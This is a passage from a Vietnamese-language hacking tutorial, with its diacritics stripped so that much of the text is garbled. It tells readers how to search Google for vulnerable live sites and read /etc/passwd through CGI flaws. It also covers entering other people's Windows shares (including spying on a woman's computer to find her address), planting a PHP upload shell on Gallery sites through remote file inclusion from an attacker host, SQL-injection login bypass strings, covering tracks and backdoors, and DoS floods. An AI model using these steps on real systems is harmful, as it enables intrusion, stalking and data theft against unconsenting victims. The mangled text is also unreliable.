ang s dng chng trnh CGI ( c gI l CGI script ) thc hinnhng cng vic cn thit 24 gi hng ngy . Nhng nguyn bn CGI scriptthc cht l nhng chng trnh c vit v c upload ln trang Web vInhng ngn ng ch yu l Perl , C , C++ , Vbscript trong Perl c achung nht v s d dng trong vic vit chng trnh ,chim mt dunglng t v nht l n c th chy lin tc trong 24 gi trong ngy .

_ Thng thng , CGI script c ct trong th mc /cgi-bin/ trn trangWeb nh VD sau :

http://www.company.com/cgi-bin/log in.cgi

vi nhng cng vic c th nh :+ To ra chng trnh m s ngi gh thm .+ Cho php nhng ngI khch lm nhng g v khng th lm nhng gtrn Website ca bn .+ Qun l user name v passwd ca thnh vin .
http://www.company.com/.htpasswdhttp://www.company.com/cgi-bin/.htpasswdhttp://www.company.com/cgi-bin/passwords/.htp%20asswdhttp://www.company.com/cgi-bin/passwd/.htpass%20wdhttp://www.company.com/cgi-bin/login.cgihttp://www.company.com/.htpasswdhttp://www.company.com/cgi-bin/.htpasswdhttp://www.company.com/cgi-bin/passwords/.htp%20asswdhttp://www.company.com/cgi-bin/passwd/.htpass%20wdhttp://www.company.com/cgi-bin/login.cgi


21/59

+ Cung cp dch v Mail .+ Cung cp nhng trang lin kt v thc hin tin nhn qua li gia cc thnhvin .+ Cung cp nhng thng bo li chi tit .v.v..

24 . ) Cch hack Web c bn nht thng qua CGI script :

_ Li th 1 : li nph-test-cgi

+ nh tn trang Web b li vo trong trnh duyt ca bn .+ nh dng sau vo cuI cng : /cgi-bin/nph-test-cgi+ Lc trn URL bn s nhn ging nh th ny :

http://www.servername.com/cgi-bin/ nph-test-cgi

+ Nu thnh cng bn s thy cc th mc c ct bn trong . xem thmc no bn nh tip :

CODE? /*

+ file cha passwd thng c ct trong th mc /etc , bn hy nh trn

URL dng sau :http://www.servername.com/cgi-bin/ nph-test-cgi?/etc/*

_ Li th 2 : li php.cgi

+ Tng t trn bn ch cn nh trn URL dng sau ly pass :

http://www.servername.com/cgi-bin/ php.cgi?/etc/passwd

Quan trng l y l nhng li c nn vic tm cc trang Web cc bnthc hnh rt kh , cc bn hy vo trang google.com ri nh t kho :

/cgi-bin/php.cgi?/etc/passwd]hoc cgi-bin/nph-test-cgi?/etc

sau cc bn hy tm trn xem th trang no cha fix li thc hnh
http://www.servername.com/cgi-bin/nph-test-cg%20ihttp://www.servername.com/cgi-bin/nph-test-cg%20i?/etc/*http://www.servername.com/cgi-bin/php.cgi?/et%20c/passwdhttp://www.servername.com/cgi-bin/nph-test-cg%20ihttp://www.servername.com/cgi-bin/nph-test-cg%20i?/etc/*http://www.servername.com/cgi-bin/php.cgi?/et%20c/passwd


22/59

nh .

25 . ) K thut xm nhp my tnh ang online :

_ Xm nhp my tnh ang online l mt k thut va d lI va kh . Bnc th ni d khi bn s dng cng c ENT 3 nhng bn s gp vn khidng n l tc s dng trn my ca nn nhn s b chm i mt cchng k v nhng my h khng share th khng th xm nhp c, do nu h tt my l mnh s b cng cc khi cha kp chm account , c mtcch m thm hn , t lm gim tc hn v c th xm nhp khi nn nhnkhng share l dng chng trnh DOS tn cng . Ok , ta s bt u :

_ Dng chng trnh scan IP nh ENT 3 scan IP mc tiu ._ Vo Start == > Run g lnh cmd ._ Trong ca s DOS hy nh lnh net view

CODE+ VD : c:\net view 203.162.30.xx

_ Bn hy nhn kt qu , nu n c share th d qu , bn ch cn nh tiplnh

net use :

+ VD : c:\net use E : 203.162.30.xxC

_ Nu khi kt ni my nn nhn m c yu cu s dng Passwd th bn hydownload chng trnh d passwd v s dng ( theo ti bn hy loadchng trnh pqwak2 p dng cho vic d passwd trn my s dng HHWin98 hoc Winme v chng trnh xIntruder dng cho Win NT ) . Ch l v cch s dng th hai chng trnh tng t nhau , dng u ta nh IPca nn nhn , dng th hai ta nh tn a share ca nn nhn nhng ivi xIntruder ta ch chnh Delay ca n cho hp l , trong mng LAN

th Delay ca n l 100 cn trong mng Internet l trn dI 5000 ._ Nu my ca nn nhn khng c share th ta nh lnh :

net use : c$ (hoc d$)``administrator``

+ VD : net use E : 203.162.30.xxC$``administrator``


23/59

Kiu chia s bng c$ l mc nh i vi tt c cc my USER l``administrator`` .

_ Chng ta c th p dng cch ny t nhp vo my ca c bn mmnh thm thng trm nh tm nhng d liu lin quan n a chca c nng ( vi iu kin l c ta ang dng my nh v bn may mnkhi tm c a ch ) . Bn ch cn chat Y!Mass ri vo DOS nh lnh :

c:\netstat n

Khi dng cch ny bn hy tt ht cc ca s khc ch khung chat Y!Mass vi c ta thi , n s gip bn d dng hn trong vic xc nh a chIP ca c ta . Sau bn dng cch xm nhp m ti ni trn .( C lanh chng tykhung ca chng ta hi xa khi tn tnh c bn xa qua mng

cng dng cch ny t nhp v tm hiu a ch ca c ta y m ,hi`hi` . )Bn s thnh cng nu my ca nn nhn khng ci firewall hay proxy .

================================================== = =

Nhiu bn c yu cu ti a ra a ch chnh xc cho cc bn thc tp ,nhng ti khng th a ra c v rt kinh nghim nhng bi hng dn ca ch chnh xc , khi cc bn thc hnh xong ot c quyn admin c

bn xo ci database ca h . Nh vy HVA s mang ting l ni btngun cho s ph hoi trn mng . mong cc bn thng cm , nu c th thti ch nu nhng cch thc cc bn tm nhng da ch b li chkhng a ra a ch c th no .

================================================== = =

phn 4 ti s cp n k thut chng xm nhp vo my tnh ca mnhkhi bn online , tm hiu s cc bc khi ta quyt nh hack mt trang Web ,k thut tm ra li trang Web thc hnh , k thut hack Web thng qua li

Gallery.v.v.


26 . ) Tm hiu v RPC (Remote Procedure Call) :

_ Windows NT cung cp kh nng s dng RPC thc thi cc ng dng


24/59

phn tn . Microsoft RPC bao gm cc th vin v cc dch v cho php ccng dng phn tn hot ng c trong mi trng Windows NT. Cc ngdng phn tn chnh bao gm nhiu tin trnh thc thi vi nhim v xc nhno . Cc tin trnh ny c th chy trn mt hay nhiu my tnh.

_Microsoft RPC s dng name service provider nh v Servers trnmng. Microsoft RPC name service provider phi i lin vi Microsoft RPCname service interface (NIS). NIS bao bao gm cc hm API cho php truycp nhiu thc th trong cng mt name service database (name servicedatabase cha cc thc th, nhm cc thc th, lch s cc thc th trnServer).Khi ci t Windows NT, Microsoft Locator t ng c chn nh l nameservice provider. N l name service provider ti u nht trn mi trngmng Windows NT.

27 . ) K thut n gin chng li s xm nhp tri php khi ang onlinethng qua RPC (Remote Procedure Call) :

_ Nu bn nghi ng my ca mnh ang c ngi xm nhp hoc b adminremote desktop theo di , bn ch cn tt chc nng remote procedure call thhin ti khng c chng trnh no c th remote desktop theo di bnc . N cn chng c hu ht tools xm nhp vo my ( v a s cctools vit connect da trn remote procedure call ( over tcp/ip )).Cc trojan

a s cng da vo giao thc ny.Cch tt: Bn vo service /remote procedure call( click chut phi ) chnstarup typt/disable hoc manual/ apply.

y l cch chng rt hu hiu vi my PC , nu thm vi cch tt filesharing th rt kh b hack ) ,nhng trong mng LAN bn cng phin phcvi n khng t v bn s khng chy c cc chng trnh c lin quann thit b ny . Ty theo cch thc bn lm vic m bn c cch chn lacho hp l . Theo ti th nu dng trong mng LAN bn hy ci mt firewall

l chc chn tng i an ton ri .

( Da theo bi vit ca huynh i nh c khoai khoaimi admin caHVA )

28 . ) Nhng bc hack mt trang web hin nay :


25/59

_ Theo lit k ca sch Hacking Exposed 3 th hack mt trang Web thngthng ta thc hin nhng bc sau :+ FootPrinting : ( In du chn )y l cch m hacker lm khi mun ly mt lng thng tin ti a v mych/doanh nghip/ngi dng. N bao gm chi tit v a ch IP, Whois,DNS ..v.v i khi l nhng thong tin chnh thc c lien quan n mc tiu.

Nhiu khi n gin hacker ch cn s dng cc cng c tm kim trn mng tm nhng thong tin .+ Scanning : ( Qut thm d )Khi c nhng thng tin ri, th tip n l nh gi v nh danhnhng nhng dch v m mc tiu c. Vic ny bao gm qut cng, xc nhh iu hnh, .v.v.. Cc cng c c s dng y nh nmap, WS

pingPro, siphon, fscam v cn nhiu cng c khc na.+ Enumeration : ( lit k tm l hng )

Bc th ba l tm kim nhng ti nguyn c bo v km, hoch tikhon ngi dng m c th s dng xm nhp. N bao gm cc mtkhu mc nh, cc script v dch v mc nh. Rt nhiu ngi qun trmng khng bit n hoc khng sa i li cc gi tr ny.+ Gaining Access: ( Tm cch xm nhp )By gi k xm nhp s tm cch truy cp vo mng bng nhng thng tinc c ba bc trn. Phng php c s dng y c th l tn cngvo li trn b m, ly v gii m file password, hay th thin nht l bruteforce (kim tra tt c cc trng hp) password. Cc cng c thng c

s dng bc ny l NAT, podium, hoc L0pht.+ Escalating Privileges : ( Leo thang c quyn )V d trong trng hp hacker xm nhp c vo mng vi ti khonguest, th h s tm cch kim sot ton b h thng. Hacker s tm cchcrack password ca admin, hoc s dng l hng leo thang c quyn.John v Riper l hai chng trnh crack password rt hay c s dng.+ Pilfering : ( Dng khi cc file cha pass b s h )Thm mt ln na cc my tm kim li c s dng tm cc phng

php truy cp vo mng. Nhng file text cha password hay cc c chkhng an ton khc c th l mi ngon cho hacker.

+ Covering Tracks : ( Xo du vt )Sau khi c nhng thng tin cn thit, hacker tm cch xo du vt, xocc file log ca h iu hnh lm cho ngi qun l khng nhn ra h thng b xm nhp hoc c bit cng khng tm ra k xm nhp l ai.+ Creating ``Back Doors`` : ( To ca sau chun b cho ln xm nhp tiptheo c d dng hn )Hacker li ``Back Doors``, tc l mt c ch cho php hacker truy nhp


26/59

tr li bng con ng b mt khng phi tn nhiu cng sc, bng vic cit Trojan hay to user mi (i vi t chc c nhiu user). Cng c yl cc loi Trojan, keylog+ Denial of Service (DoS) : ( Tn cng kiu t chi dch v )

Nu khng thnh cng trong vic xm nhp, th DoS l phng tin cuicng tn cng h thng. Nu h thng khng c cu hnh ng cch,n s b ph v v cho php hacker truy cp. Hoc trong trng hp khc thDoS s lm cho h thng khng hot ng c na. Cc cng c hay cs dng tn cng DoS l trin00, Pong Of Death, teardrop, cc loi nuker,flooder . Cch ny rt li hi , v vn cn s dng ph bin hin nay .

_ Tu theo hiu bit v trnh ca mnh m mt hacker b qua bc no .Khng nht thit phI lm theo tun t . Cc bn hy nh n cu bitngi bit ta trm trn trm thng .

( Ti liu ca HVA v hackervn.net )

29 . ) Cch tm cc Website b li :

_ Chc cc bn bit n cc trang Web chuyn dng tm kim thng tintrn mng ch ? Nhng cc bn chc cng khng ng l ta c th dngnhng trang tm nhng trang Web b li ( Ti vn thng dng tranggoogle.com v khuyn cc bn cng nn dng trang ny v n rt mnh vhiu qu ) .

_ Cc bn quan tm n li trang Web v mun tm chng bn ch cn vogoogle.com v nh on li vo sau allinurl : . VD ta c on m litrang Web sau :

cgi-bin/php.cgi?/etc/passwd

cc bn s nh :

allinurl:cgi-bin/php.cgi?/etc/passwd

N s lit k ra nhng trang Web ang b li ny cho cc bn , cc bn hynhn xung di cng ca mi mu lit k ( dng a ch mu xanh l cy )nu dng no vit y chang t kho mnh nhp vo th trang hoc ang

b li .Cc bn c xm nhp vo c hay khng th cng cn tu vo trangWeb fix li ny hay cha na .

_ Cc bn quan tm n li forum , cc bn mun tm forum dng ny thc tp , ch cn nhp t kho


27/59

powered by

VD sau l tm forum dng Snitz 2000 :

powered by Snitz 2000

_ Tuy nhin , vic tm ra ng forum hoc trang Web b li theo cch cxc sut khng cao , bn hy quan tm n on string c bit trong URLc trng cho tng kiu trang Web hoc forum ( ci ny rt quan trng ,cc bn hy t mnh tm hiu thm nh ) . VD tm vi li Hosting Controllerth ta s c on c trng sau

``/admin hay /advadmin hay /hosting``

ta hy nh t kho :

allinurl:/advadminhoc allinurl:/adminhoc allinurl:/hosting

N s lit k ra cc trang Web c URL dng :

http://tentrangweb.com/advadminhoc http://tentrangweb.com/adminhoc http://tentrangweb.com/hosting

VD vi forum UBB c on c trng

``cgi-bin/ultimatebb.cgi?``

Ta cng tm tng t nh trn .Ch cn bn bit cch tm nh vy ri th sau ny ch cn theo di thng tin

cp nht bn trang Li bo mt ca HVA do bn LeonHart post hng ngycc bn s hiu c ngha ca chng v t mnh kim tra .

30 . ) K thut hack Web thng qua li Gallery ( mt dng ca li php codeinject ):

_ Gallery l mt cng c cho php to mt gallery nh trn web c vit
http://tentrangweb.com/advadminhttp://tentrangweb.com/adminhttp://tentrangweb.com/hostinghttp://tentrangweb.com/advadminhttp://tentrangweb.com/adminhttp://tentrangweb.com/hosting


28/59

bng PHP , li dng s h ny ta c th li dng vit thm vo mtm PHP cho php ta upload , chnh l mc ch chnh ca ta .

_ Trc ht bn hy ng k mt host min ph , tt nht l bn ng k brinkster.com cho d . Sau bn m notepad v to file PHP vi on msau :

CODE


29/59

print ``$filename was uploaded successfuly``;$realname = $_FILES[ùserfile`][`name ];

print ``realname is $realname\n``;print ``copying file to uploads dir ` .$realname;copy($_FILES[ùserfile`][`tmp_name`],*PATH*.$realna me); // lu *PATH* chng ta s thay i sau} else {echo `Possible file upload attack: filename``.$_FILES[ùserfile`][`name`].``.``;}}if ($act == `ùpload``) {handleupload();}

echo ``File:

``;

? >

Bn hy t tn l upload.php , n s dng upload ln trang Web ca nnnhn .

_ Tip theo Bn vo Google, g ``Powered by gallery`` ri enter, Google slit k mt ng nhng site s dng Gallery , bn hy chn ly mt trang btk rI dng link sau th xem n cn mc lI Gallery hay khng :

http:// trang Web ca nn nhn > /gallery./captionator.php?

GALLERY_BASEDIR=http://ww wxx.brinkster.com/ /

Nu bn thy hin ln mt hnh ch nht pha trn cng , bn phi can l lnh chuyn tip c ch Go l coi nh bn tm thy c Itng ri . By gi bn c th g lnh thng qua ch nht hack Web ca nn nhn .Trc ht bn hy g lnh pwd xc nh ng dn tuyt i n th


30/59

mc hin thi ri nhn nt Go , khi n cho kt qu bn hy nhanh chngghi li ng dn pha dI ( Ti s s dng VD ng dn ti tm thy l/home/abc/xyz/gallery ).Sau bn nh tip lnh |s a| lit k cc th mc con ca n . Bygi bn hy nhn kt qu , bn s thy mt ng cc th mc con m ta lit k . Bn hy lun nh l mc ch ca chng ta l tm mt th mc cth dng upload file upload.php m ta chun b t trc do bn hyxc nh cng ti bng cch nhn vo nhng ch cuI cng ca mi hng ktqu :+ Bn hy loi b trng hp cc th mc m c du . hoc .. v y lth mc gc hoc l th mc o ( N thng c xp trn cng ca cchng kt qu ) .+ Bn cng loI b nhng hng c ch cui cng c gn ui ( VD nhconfig.php , check.inc .v.v ) v y l nhng file ch khng phi l th

mc .+ Cn li l nhng th mc c th upload nhng ti khuyn bn nn chnnhng hng cha tn th mc m c cha s ln hn 1 ( Bn c th xc nhc chng bng cch nhn ct th 2 t tri sang ) , v nh vy va chcchn y l th mc khng phi th mc o , va lm cho admin ca trangWeb kh pht hin khi ta ci file ca ta vo . Ti VD ti pht hin ra thmc loveyou c cha 12 file c th cho ta upload , nh vy ng dnchnh thc m ta upload ln s l :

/home/abc/xyz/Gallery/loveyouBy gi bn hy vo account host ca bn, sa ni dung file init.php gingnh m ca file upload.php, nhng sa li *PATH* thnh/home/abc/xyz/gallery/loveyou/ . ng thi cng chun b mt fileupload.php trn my ca bn vi *PATH* l ( 2 du ngoc kp ).By gi l ta c th upload file upload.php ln trang Web ca nn nhnc ri , bn hy nhp a ch sau trn trnh duyt Web ca bn :

http:// trang Web ca nn nhn > /gallery./captionator.php?

GALLERY_BASEDIR=http://ww wxx.brinkster.com/ /

Bn s thy xut hin tip mt khung hnh ch nht v bn cnh l c 2 ntlnh , mt l nt brown , mt l nt upload . Nt brown bn dng dn n a ch file upload.php bn chun b trn my ca bn , ntupload khi bn nhn vo th n s upload file upload.php ln trang Webca nn nhn . Ok , by gi coi nh bn hon thnh chng ng hack


31/59

Web ri . T by gi bn hy vn dng tn cng i th nh lydatabase , password ( lm tng t nh cc bi hng dn hack trc ) ,nhng cc bn ch nn thc tp ch ng xo database hay ph Web ca h.

Nu l mt hacker chn chnh cc bn ch cn upload ln trang Web dngch : Hack by .. l ri .Cng nh nhng ln trc , cc bn c thnh cng hay khng cng tuthuc vo s may mn v kin tr nghin cu vn dng kin thc ca cc

bn .

( Da theo hng dn hack ca huynh vnofear viethacker.net )


31 . ) Gi tin TCP/IP l g?

TCP/IP vit tt cho Transmission Control Protocol and Internet Protocol,mt Gi tin TCP/IP l mt khi d liu c nn, sau km thm mtheader v gi n mt my tnh khc. y l cch thc truyn tin cainternet, bng cch gi cc gi tin. Phn header trong mt gi tin cha a

ch IP ca ngi gi gi tin. Bn c th vit li mt gi tin v lm cho ntrong ging nh n t mt ngi khc!! Bn c th dng cch ny tmcch truy nhp vo rt nhiu h thng m khng b bt. Bn s phi chytrn Linux hoc c mt chng trnh cho php bn lm iu ny.

32 . ) Linux l gi`:

_Ni theo ngha gc, Linux l nhn ( kernel ) ca HH. Nhn l 1 phnmm m trch chc v lin lc gia cc chng trnh ng dng my tnh v

phn cng. Cung cp cc chng nng nh: qun l file, qun l b nh o,cc thit b nhp xut nhng cng, mn hnh, bn phm, .... Nhng NhnLinux cha phi l 1 HH, v th nn Nhn Linux cn phi lin kt vinhng chng trnh ng dng c vit bi t chc GNU to ln 1 HHhon chnh: HH Linux. y cng l l do ti sao chng ta thyGNU/Linux khi c nhc n Linux.Tip theo, 1 cng ty hay 1 t chc ng ra ng gi cc sn phm ny


32/59

( Nhn v Chng trnh ng dng ) sau sa cha mt s cu hnh mang c trng ca cng ty/ t chc mnh v lm thm phn ci t( Installation Process ) cho b Linux , chng ta c : Distribution. CcDistribution khc nhau s lng v loi Software c ng gi cng nhqu trnh ci t, v cc phin bn ca Nhn. 1 s Distribution ln hin nayca Linux l : Debian, Redhat, Mandrake, SlackWare, Suse .

33 . ) Cc lnh cn bn cn bit khi s dng hoc xm nhp vo h thngLinux :

_ Lnh `` man`` : Khi bn mun bit cch s dng lnh no th c th dngti lnh nay :Cu trc lnh : $ man .V d : $ man man

_ Lnh `` uname ` : cho ta bit cc thng tin c bn v h thngV d : $uname -a ; n s a ra thng tin sau :

Linux gamma 2.4.18 #3 Wed Dec 26 10:50:09 ICT 2001 i686 unknown

_ Lnh id : xem uid/gid hin ti ( xem nhm v tn hin ti )

_ Lnh w : xem cc user ang login v action ca h trn h thng .V D : $w n s a ra thng tin sau :

10:31pm up 25 days, 4:07, 18 users, load average: 0.06, 0.01, 0.00

_ Lnh ps: xem thng tin cc process trn h thngV d : $ps axuw

_ Lnh cd : bn mun di chuyn n th mc no . phi nh n lnh ny .V du : $ cd /usr/bin ---- > n s a bn n th mc bin

_ Lnh mkdir : to 1 th mc .V d : $ mkdir /home/convit --- > n s to 1 th mc convit trong /home

_ Lnh rmdir : g b th mc

V d : $ rmdir /home/conga ---- > n s g b th mc conga trong /home ._ Lnh ls: lit k ni dung th mcV d : $ls -laR /

_ Lnh printf: in d liu c nh dng, ging nh s dng printf() ca C++ .V d : $printf %s ``\x41\x41\x41\x41`

_ Lnh pwd: a ra th mc hin hnhV d : $pwd ------ > n s cho ta bit v tr hin thi ca ta u :


33/59

/home/level1_ Cc lnh : cp, mv, rm c ngha l : copy, move, delete fileV d vi lnh rm (del) : $rm -rf /var/tmp/blah ----- > n s del file blah .Lm tng t i vi cc lnh cp , mv .

_ Lnh find : tm kim file, th mcV d : $find / -user level2

_ Lnh grep: cng c tm kim, cch s dng n gin nht : grep``something``Vidu : $ps axuw | grep ``level1``

_ Lnh Strings: in ra tt c cc k t in c trong 1 file. Dng n tm cckhai bo hnh chui trong chng trnh, hay cc gi hm h thng, c khitm thy c password naVD: $strings /usr/bin/level1

_ Lnh strace: (linux) trace cc gi hm h thng v signal, cc k hu ch

theo di flow ca chng trnh, cch nhanh nht xc nh chng trnhb li on no. Trn cc h thng unix khc, tool tng ng l truss,ktrace .V d : $strace /usr/bin/level1

_ Lnh`` cat, more ``: in ni dung file ra mn hnh

$cat /etc/passwd | more -- > n s a ra ni dung file passwd mt cchnhanh nht .$more /etc/passwd ---- > N s a ra ni dung file passwd mt cch t t .

_ Lnh hexdump : in ra cc gi tr tng ng theo ascii, hex, octal, decimalca d liu nhp vo .V d : $echo AAAA | hexdump

_ Lnh : cc, gcc, make, gdb: cc cng c bin dch v debug .V d : $gcc -o -g bof bof.cV d : $make bofV d : $gdb level1(gdb) break main(gdb) run

_ Lnh perl: mt ngn ngV d : $perl -e `print ``A``x1024` | ./bufferoverflow ( Li trn b m khi tanh vo 1024 k t )

_ Lnh ``bash`` : n lc t ng ho cc tc v ca bn bng shell script,cc mnh v linh hot .Bn mun tm hiu v bash , xem n nh th no :$man bash


34/59

_ Lnh ls : Xem ni dung th mc ( Lit k file trong th mc ) .V D : $ ls /home ---- > s hin ton b file trong th mc Home$ ls -a ----- > hin ton b file , bao gm c file n$ ls -l ----- > a ra thng tin v cc file

_ Lnh ghi d liu u ra vo 1 file :Vd : $ ls /urs/bin > ~/convoi ------ > ghi d liu hin th thng tin ca thmc bin vo 1 file convoi .

34 . ) Nhng hiu bit c bn xung quanh Linux :

a . ) Mt vi th mc quan trng trn server :

_ /home : ni lu gi cc file ngi s dng ( VD : ngi ng nhp hthng c tn l convit th s c 1 th mc l /home/convit )

_ /bin : Ni x l cc lnh Unix c bn cn thit nh ls chng hn ._ /usr/bin : Ni x l cc lnh dc bit khc , cc lnh dng bi ngi sdng c bit v dng qun tr h thng .

_ /bot : Ni m kernel v cc file khc c dng khi khi ng ._ /ect : Cc file hot ng ph mng , NFS (Network File System ) Th tn( y l ni trng yu m chng ta cn khai thc nhiu nht )

_ /var : Cc file qun tr_ /usr/lib : Cc th vin chun nh libc.a_ /usr/src : V tr ngun ca cc chng trnh .

b . ) V tr file cha passwd ca mt s phin bn khc nhau :

CODEAIX 3 /etc/security/passwd !/tcb/auth/files//A/UX 3.0s /tcb/files/auth/?/*BSD4.3-Ren /etc/master.passwd *ConvexOS 10 /etc/shadpw *ConvexOS 11 /etc/shadow *DG/UX /etc/tcb/aa/user/ *

EP/IX /etc/shadow xHP-UX /.secure/etc/passwd *IRIX 5 /etc/shadow xLinux 1.1 /etc/shadow *OSF/1 /etc/passwd[.dir|.pag] *SCO Unix #.2.x /tcb/auth/files//SunOS4.1+c2 /etc/security/passwd.adjunct ##username


35/59

SunOS 5.0 /etc/shadowSystem V Release 4.0 /etc/shadow xSystem V Release 4.2 /etc/security/* databaseUltrix 4 /etc/auth[.dir|.pag] *UNICOS /etc/udb *

35 . ) Khai thc li ca Linux qua l hng bo mt ca WU-FTP server :

_ WU-FTP Server (c pht trin bi i Hc Washington ) l mt phnmm Server phc v FTP c dng kh ph bin trn cc h thng Unix &Linux ( tt c cc nh phn phi: Redhat, Caldera, Slackware, Suse,Mandrake....) v c Windows.... , cc hacker c th thc thi cc cu lnh camnh t xa thng qua file globbing bng cch ghi ln file c trn h thng

._ Tuy nhin , vic khai thc li ny khng phI l d v n phi hi nhng iu kin sau :+ Phi c account trn server .+ Phi t c Shellcode vo trong b nh Process ca Server .+ Phi gi mt lnh FTP c bit cha ng mt globbing mu c bit mkhng b server pht hin c li .+ Hacker s ghi ln mt Function, Code ti mt Shellcode, c th n sc thc thi bi chnh Server FTP .

_ Ta hy phn tch VD sau v vic ghi ln file ca server FTP :CODEftp > open localhost


36/59

1405 ? S 0:00 ftpd: accepting connections on port 21 chp nhn kt nI cng 21 .7611 tty3 S 1:29 gdb /usr/sbin/wu.ftpd26256 ? S 0:00 ftpd:sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa26265 tty3 R 0:00 bash -c ps ax | grep ftpd(gdb) at 26256Attaching to program: /usr/sbin/wu.ftpd, process 26256


37/59

trc khi chuyn cho ng dng web x l, bn c th login m khng cnusername v password, thi hnh lnh t xa, ot d liu v ly root ca SQLserver. Cng c dng tn cng l mt trnh duyt web bt k, chng hnnh Internet Explorer, Netscape, Lynx, ...

_ Bn c th kim c trang Web b li bng cch dng cc cng c tmkim kim cc trang cho php submit d liu . Mt s trang Web chuyntham s qua cc khu vc n nn bn phI viewsource mI thy c . VD taxc nh c trang ny s dng Submit d liu nh nhn vo m m ta viewsource :

CODE

_ Kim tra th xem trang Web c b li ny hay khng bng cch nhp vo

login v pass ln lt nh sau :

- Login: hi` or 1=1--- Pass: hi` or 1=1--

Nu khng c bn th tip vi cc login v pass sau :

CODE` or 1=1--

`` or 1=1--or 1=1--` or à`=à`` or `à``=`à`) or (à`=à

Nu thnh cng, bn c th login vo m khng cn phi bit username vpassword .Li ny c dnh dng n Query nn nu bn no tng hc qua c s dliu c th khai thc d dng ch bng cch nh cc lnh Query trn trnh

duyt ca cc bn . Nu cc bn mun tm hiu k cng hn v li ny cth tm cc bi vit ca nhm vicky tm hiu thm .

37 . ) Mt VD v hack Web thng qua li admentor ( Mt dng ca li SQLInjection ) :

_ Trc tin bn vo google.com tm trang Web admentor bng t kho


38/59

allinurl : admentor ._ Thng thng bn s c kt qu sau :

http://www.someserver.com/admentor /admin/admin.asp

_ Bn th nhp ` or ``=` vo login v password :

CODELogin : ` or ``=`Password : ` or ``=`

_ Nu thnh cng bn s xm nhp vo Web b li vi vai tr l admin ._ Ta hy tm hiu v cch fix li ny nh :

+ Lc cc k t c bit nh ` `` ~ \ bng cch chm vo javascrip onm sau :

CODEfunction RemoveBad(strTemp){strTemp = strTemp.replace(/\ |\``|\`|\%|\;|$|$|\&|\+|\-/g,````);return strTemp;

}+ V gi n t bn trong ca asp script :

CODEvar login = var TempStr = RemoveBad(Request.QueryString(``login``));var password = var TempStr = RemoveBad(Request.QueryString(``password``));

- Vy l ta fix xong li .

- Cc bn c th p dng cch hack ny cho cc trang Web khc c submitd liu , cc bn hy test th xem i , cc trang Web Vit Nam mnh b
http://www.someserver.com/admentor/admin/admi%20n.asphttp://www.someserver.com/admentor/admin/admi%20n.asp


39/59

nhiu lm , ti kim c kha kh pass admin bng cch th ny ri( nhng cng bo h fix li ) .- C nhiu trang khi login khng phi bng ` or ``= m bng cc nickname c tht ng k trn trang Web , ta vo link thnh vin kimnick ca mt admin test th nh .Hack vui v .

phn 6 ti s cp n kiu tn cng t chi dch v ( DoS attack ) , mtkiu tn cng li hi lm cho trang Web hng mnh nh HVA ca chngta b tt nghn ch trong thI gian ngn cc admin bn i ung cafe ht mkhng ai trng coi . Km theo l cc phng php tn cng DoS vang c s dng .


38.) DoS attack l g? ( Denial Of Services Attack )

DoS attack ( dch l tn cng t chi dch v ) l kiu tn cng rt li hi ,vi loi tn cng ny , bn ch cn mt my tnh kt ni Internet l c ththc hin vic tn cng c my tnh ca I phng . thc cht ca DoSattack l hacker s chim dng mt lng ln ti nguyn trn server ( ti

nguyn c th l bng thng, b nh, cpu, a cng, ... ) lm cho serverkhng th no p ng cc yu cu t cc my ca ngui khc ( my canhng ngi dng bnh thng ) v server c th nhanh chng b ngng hotng, crash hoc reboot .

39.) Cc loi DoS attack hin ang c bit n v s dng :

a . ) Winnuke :

_DoS attack loi ny ch c th p dng cho cc my tnh ang chyWindows9x . Hacker s gi cc gi tin vi d liu ``Out of Band`` n cng139 ca my tnh ch.( Cng 139 chnh l cng NetBIOS, cng ny chchp nhn cc gi tin c c Out of Band c bt ) . Khi my tnh cavictim nhn c gi tin ny, mt mn hnh xanh bo li s c hin thln vi nn nhn do chng trnh ca Windows nhn c cc gi tin nynhng n li khng bit phn ng vi cc d liu Out Of Band nh th no


40/59

dn n h thng s b crash .

b . ) Ping of Death :

_ kiu DoS attack ny , ta ch cn gi mt gi d liu c kch thc lnthng qua lnh ping n my ch th h thng ca h s b treo .

_ VD : ping l 65000

c . ) Teardrop :

_ Nh ta bit , tt c cc d liu chuyn i trn mng t h thng ngunn h thng ch u phi tri qua 2 qu trnh : d liu s c chia rathnh cc mnh nh h thng ngun, mi mnh u phi c mt gi troffset nht nh xc nh v tr ca mnh trong gi d liu c

chuyn i. Khi cc mnh ny n h thng ch, h thng ch s da vogi tr offset sp xp cc mnh li vi nhau theo th t ng nh banu . Li dng s h , ta ch cn gi n h thng ch mt lot gi

packets vi gi tr offset chng cho ln nhau. H thng ch s khng thno sp xp li cc packets ny, n khng iu khin c v c th bcrash, reboot hoc ngng hot ng nu s lng gi packets vi gi troffset chng cho ln nhau qu ln !

d . ) SYN Attack :

_ Trong SYN Attack, hacker s gi n h thng ch mt lot SYN packetsvi a ch ip ngun khng c thc. H thng ch khi nhn c cc SYN

packets ny s gi tr li cc a ch khng c thc v ch I nhnthng tin phn hi t cc a ch ip gi . V y l cc a ch ip khng cthc, nn h thng ch s s ch i v ch v cn a cc ``request`` chi ny vo b nh , gy lng ph mt lng ng k b nh trn my chm ng ra l phi dng vo vic khc thay cho phi ch i thng tin phnhi khng c thc ny . Nu ta gi cng mt lc nhiu gi tin c a ch IPgi nh vy th h thng s b qu ti dn n b crash hoc boot my tnh .

== > nm du tay .

e . ) Land Attack :

_ Land Attack cng gn ging nh SYN Attack, nhng thay v dng cc ach ip khng c thc, hacker s dng chnh a ch ip ca h thng nn nhn.iu ny s to nn mt vng lp v tn gia trong chnh h thng nn nhn


41/59

, gia mt bn cn nhn thng tin phn hi cn mt bn th chng bao gigi thng tin phn hi i c . == > Gy ng p lng ng .

f . ) Smurf Attack :

_Trong Smurf Attack, cn c ba thnh phn: hacker (ngi ra lnh tncng), mng khuch i (s nghe lnh ca hacker) v h thng ca nn nhn.Hacker s gi cc gi tin ICMP n a ch broadcast ca mng khuch i.iu c bit l cc gi tin ICMP packets ny c a ch ip ngun chnh la ch ip ca nn nhn . Khi cc packets n c a ch broadcast camng khuch i, cc my tnh trong mng khuch i s tng rng mytnh nn nhn gi gi tin ICMP packets n v chng s ng lot gi trli h thng nn nhn cc gi tin phn hi ICMP packets. H thng my nnnhn s khng chu ni mt khi lng khng l cc gi tin ny v nhanh

